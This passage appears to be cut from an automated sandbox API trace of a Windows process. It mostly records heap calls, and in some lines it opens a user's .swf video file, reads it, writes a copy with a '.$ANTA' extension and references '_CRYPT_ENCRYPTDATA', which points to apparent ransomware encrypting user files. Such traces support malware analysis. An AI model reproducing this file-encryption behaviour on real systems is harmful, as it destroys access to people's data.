(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0098.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0098.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0098.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0098.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0098.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0098.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0098.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0098.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0098.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0098.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0098.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0098.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0098.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea0b8 [0098.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0098.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0098.741] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0098.741] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0098.741] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0098.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0098.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0098.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0098.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0098.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0098.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0098.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0098.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0098.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0098.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0098.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0098.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0098.742] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\F0zOuSSpVPNmctC-N.swf" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\f0zousspvpnmctc-n.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0098.742] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.742] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0098.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0098.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0098.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0098.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0098.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0098.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0098.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0098.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0098.743] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0098.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0098.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0098.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0098.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0098.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0098.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0098.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0098.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0098.743] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0098.743] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0098.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0098.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0098.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0098.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0098.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0098.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0098.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0098.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0098.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0098.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0098.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0098.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0098.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0098.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0098.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0098.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0098.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0098.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0098.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0098.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0098.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0098.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0098.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0098.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0098.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0098.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0098.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0098.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0098.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0098.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369dc8 [0098.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0098.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0098.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0098.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0098.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0098.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0098.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0098.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0098.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369dc8 | out: hHeap=0x1780000) returned 1 [0098.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0098.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0098.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0098.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0098.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369fd8 [0098.745] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc")) returned 0x10 [0098.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369fd8 | out: hHeap=0x1780000) returned 1 [0098.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0098.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0098.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0098.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0098.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0098.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0098.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0098.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0098.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0098.746] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\F0zOuSSpVPNmctC-N.swf.$ANTA" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\f0zousspvpnmctc-n.swf.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0098.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0098.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0098.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0098.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0098.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0098.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0098.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0098.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0098.747] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0098.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0098.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0098.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0098.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0098.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0098.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0098.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0098.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0098.747] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0098.747] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0098.748] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0098.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0098.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0098.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0098.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0098.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0098.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0098.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0098.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0098.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0098.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0098.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0098.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0098.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0098.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0098.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e01020 [0098.752] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0098.752] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0xcaef, lpOverlapped=0x0) returned 1 [0098.754] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0098.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0098.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0098.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0098.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0098.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xcaef) returned 0x4516010 [0098.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e01020 | out: hHeap=0x1780000) returned 1 [0098.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0098.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0098.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0098.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0098.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0098.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xcaef) returned 0x4522b08 [0098.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0098.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0098.760] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0098.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0098.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0098.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0098.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0098.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xcaef) returned 0x4516010 [0098.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0098.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0098.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0098.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0098.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0098.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0098.761] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0098.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0098.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0098.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0098.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0098.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0098.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0098.761] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0098.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0098.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ce8 [0098.761] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0098.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ce8 | out: hHeap=0x1780000) returned 1 [0098.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0098.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0098.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2690 [0098.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0098.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0098.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0098.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0098.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xcaef) returned 0x4516010 [0098.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0098.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2640 [0098.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0098.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0098.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0098.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2610 [0098.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0098.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0098.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0098.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2630 [0098.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0098.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0098.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0098.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca268 [0098.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0098.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0098.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0098.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0098.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0098.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xcaef) returned 0x452f600 [0098.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0098.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0098.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0098.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0098.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0098.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 